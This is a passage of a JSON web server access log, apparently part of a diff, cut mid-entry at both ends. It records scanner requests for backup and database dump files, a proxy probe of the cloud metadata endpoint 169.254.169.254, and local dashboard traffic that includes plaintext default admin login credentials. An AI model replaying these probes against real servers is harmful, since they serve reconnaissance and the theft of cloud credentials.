Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sql.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"37.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.7z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.bz2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.980","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.lz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.803","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.rar HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.423","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.xz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.446","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.zip HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.tar.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.314","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.db HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sqlite HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.865","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sqlitedb HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.471","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:15 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sql.7z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.482","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sql.bz2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.968","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sql.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.362","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sql.lz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sql.rar HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.707","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sql.xz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sql.zip HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.770","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sql.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:15:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.310","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:45:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.288","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:19:15:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.388","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:19:45:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:20:15:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:20:45:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:21:15:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.292","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:21:45:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.257","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:22:15:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:22:45:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.263","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:23:15:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.863","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:23:45:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.436","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "04/May/2022:00:01:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.120","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "04/May/2022:00:01:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.146","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "04/May/2022:00:01:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.145","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "04/May/2022:00:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.144","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "04/May/2022:00:02:14 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.146","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:06:09:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.707","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:06:09:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:06:09:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.874","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:06:09:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:06:09:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.414","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:06:10:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.464","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:06:40:32 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.511","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:06:43:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"GET /index.php/dev-api/vue-element-admin/user/info?token=admin-token HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.455","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9527/", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:06:43:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"GET /index.php/92e537ccf49b344fb389.hot-update.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.633","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9527/", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:06:43:45 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22111111\x22}","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/dev-api/vue-element-admin/user/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.498","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9527/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:06:45:29 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22111111\x22}","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/dev-api/vue-element-admin/user/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9527/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:06:47:20 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22111111\x22}","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/dev-api/vue-element-admin/user/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.412","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9527/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:10:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.794","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:07:24:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/operating HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.933","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"GET /index.php/favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.811","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/risktype HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.893","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/attacks HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.893","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/souattack HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.965","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/attacks HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.878","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/souattack HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.872","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/risktype HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/operating HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.745","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/monitors HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.924","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/monitors HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"7.072","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/attacks HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.696","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/risktype HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.742","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:24:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/operating HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"3.303","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:25:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/souattack HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"3.893","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:25:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/boards/monitors HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"5.982","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": 